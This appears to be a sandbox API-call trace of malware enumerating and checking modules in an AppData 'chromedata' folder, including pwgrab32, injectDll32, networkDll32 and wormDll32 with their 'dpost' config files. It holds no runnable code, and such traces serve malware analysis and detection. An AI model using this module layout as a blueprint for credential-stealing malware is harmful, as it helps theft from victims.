	[0247.570] GetFileTime (in: hFile=0x674, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5cee06e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0247.570] CloseHandle (hObject=0x674) returned 1
	[0247.570] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7b42cc20, dwHighDateTime=0x1d50a6a)) 
	[0247.570] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0247.570] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x674
	[0247.570] GetFileTime (in: hFile=0x674, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6052dcc0, dwHighDateTime=0x1d50a6a)) returned 1
	[0247.570] CloseHandle (hObject=0x674) returned 1
	[0247.571] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7b42cc20, dwHighDateTime=0x1d50a6a)) 
	[0247.571] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0247.571] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x674
	[0247.571] GetFileTime (in: hFile=0x674, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a)) returned 1
	[0247.571] CloseHandle (hObject=0x674) returned 1
	[0247.571] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7b42cc20, dwHighDateTime=0x1d50a6a)) 
	[0247.571] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0247.571] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x674
	[0247.571] GetFileTime (in: hFile=0x674, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a)) returned 1
	[0247.571] CloseHandle (hObject=0x674) returned 1
	[0247.571] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7b42cc20, dwHighDateTime=0x1d50a6a)) 
	[0247.571] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0247.571] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0247.572] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x129128, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0247.572] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\") returned=""
	[0247.572] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\*.*", lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x22b6f40
	[0247.572] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0247.572] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5992b680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5992b680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x599517e0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x90bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32", cAlternateFileName="INJECT~1")) returned 1
	[0247.572] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fff00
	[0247.572] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21dfb8
	[0247.572] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5b9e6500, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5ceba580, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ceba580, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32_configs", cAlternateFileName="INJECT~2")) returned 1
	[0247.572] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68a088a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x68a088a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x68a088a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x4ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32", cAlternateFileName="NETWOR~1")) returned 1
	[0247.572] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22fff00, Size=0x10) returned 0x27e1528
	[0247.572] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21db68
	[0247.572] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x69f02a80, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x69f02a80, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x69f02a80, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32_configs", cAlternateFileName="NETWOR~2")) returned 1
	[0247.572] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e5ad7a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6e5ad7a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6e5d3900, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x48b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32", cAlternateFileName="")) returned 1
	[0247.572] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1528, Size=0x10) returned 0x22fff00
	[0247.572] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d940
	[0247.572] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6eff1680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6eff1680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6eff1680, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32_configs", cAlternateFileName="PSFIN3~1")) returned 1
	[0247.572] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5edac380, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5edac380, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ee1e7a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x111360, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32", cAlternateFileName="")) returned 1
	[0247.572] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22fff00, Size=0x10) returned 0x27e1528
	[0247.572] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21ca28
	[0247.572] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x60507b60, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x60507b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x60507b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32_configs", cAlternateFileName="PWGRAB~1")) returned 1
	[0247.572] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70f7ba00, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70f7ba00, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x28e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="shareDll32", cAlternateFileName="SHARED~1")) returned 1
	[0247.572] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1528, Size=0x20) returned 0x27c01c0
	[0247.572] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d0a0
	[0247.572] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 1
	[0247.572] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27c01c0, Size=0x20) returned 0x27c0238
	[0247.572] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21cc50
	[0247.572] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 1
	[0247.572] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27c0238, Size=0x20) returned 0x27c01c0
	[0247.572] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21ce78
	[0247.620] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 0
	[0247.621] GetLastError () returned 0x12
	[0247.621] FindClose (in: hFindFile=0x22b6f40 | out: hFindFile=0x22b6f40) returned 1
	[0247.621] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32") returned="injectDll32"
	[0247.621] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21e858
	[0247.621] GetFullPathNameW (in: lpFileName="Data\\injectDll32", nBufferLength=0x105, lpBuffer=0x21e858, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32", lpFilePart=0x0) returned 0x41
	[0247.621] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x674
	[0247.621] GetFileTime (in: hFile=0x674, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x599517e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0247.621] CloseHandle (hObject=0x674) returned 1
	[0247.621] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7b4c51a0, dwHighDateTime=0x1d50a6a)) 
	[0247.621] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32") returned="networkDll32"
	[0247.621] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21e858
	[0247.621] GetFullPathNameW (in: lpFileName="Data\\networkDll32", nBufferLength=0x105, lpBuffer=0x21e858, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32", lpFilePart=0x0) returned 0x42
	[0247.621] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x674
	[0247.621] GetFileTime (in: hFile=0x674, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0247.621] CloseHandle (hObject=0x674) returned 1
	[0247.622] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7b4c51a0, dwHighDateTime=0x1d50a6a)) 
	[0247.622] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32") returned="psfin32"
	[0247.622] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21e858
	[0247.622] GetFullPathNameW (in: lpFileName="Data\\psfin32", nBufferLength=0x105, lpBuffer=0x21e858, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32", lpFilePart=0x0) returned 0x3d
	[0247.622] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x674
	[0247.622] GetFileTime (in: hFile=0x674, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x6e5d3900, dwHighDateTime=0x1d50a6a)) returned 1
	[0247.622] CloseHandle (hObject=0x674) returned 1
	[0247.622] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7b4c51a0, dwHighDateTime=0x1d50a6a)) 
	[0247.622] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32") returned="pwgrab32"
	[0247.622] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21e858
	[0247.622] GetFullPathNameW (in: lpFileName="Data\\pwgrab32", nBufferLength=0x105, lpBuffer=0x21e858, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32", lpFilePart=0x0) returned 0x3e
	[0247.622] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x674
	[0247.622] GetFileTime (in: hFile=0x674, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x5ee1e7a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0247.623] CloseHandle (hObject=0x674) returned 1
	[0247.623] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7b4c51a0, dwHighDateTime=0x1d50a6a)) 
	[0247.623] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32") returned="shareDll32"
	[0247.623] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21e858
	[0247.623] GetFullPathNameW (in: lpFileName="Data\\shareDll32", nBufferLength=0x105, lpBuffer=0x21e858, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32", lpFilePart=0x0) returned 0x40
	[0247.623] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\sharedll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x674
	[0247.623] GetFileTime (in: hFile=0x674, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x70fa1b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0247.623] CloseHandle (hObject=0x674) returned 1
	[0247.623] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7b4c51a0, dwHighDateTime=0x1d50a6a)) 
	[0247.623] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32") returned="systeminfo32"
	[0247.623] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21e858
	[0247.623] GetFullPathNameW (in: lpFileName="Data\\systeminfo32", nBufferLength=0x105, lpBuffer=0x21e858, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32", lpFilePart=0x0) returned 0x42
	[0247.623] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\systeminfo32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x674
	[0247.623] GetFileTime (in: hFile=0x674, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x46215b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0247.623] CloseHandle (hObject=0x674) returned 1
	[0247.623] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7b4c51a0, dwHighDateTime=0x1d50a6a)) 
	[0247.624] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32") returned="wormDll32"
	[0247.624] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21e858
	[0247.624] GetFullPathNameW (in: lpFileName="Data\\wormDll32", nBufferLength=0x105, lpBuffer=0x21e858, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32", lpFilePart=0x0) returned 0x3f
	[0247.624] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\wormdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x674
	[0247.624] GetFileTime (in: hFile=0x674, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a)) returned 1
	[0247.624] CloseHandle (hObject=0x674) returned 1
	[0247.624] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7b4c51a0, dwHighDateTime=0x1d50a6a)) 
	[0247.624] WinHttpCloseHandle (hInternet=0x27e7968) returned 1
	[0247.624] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
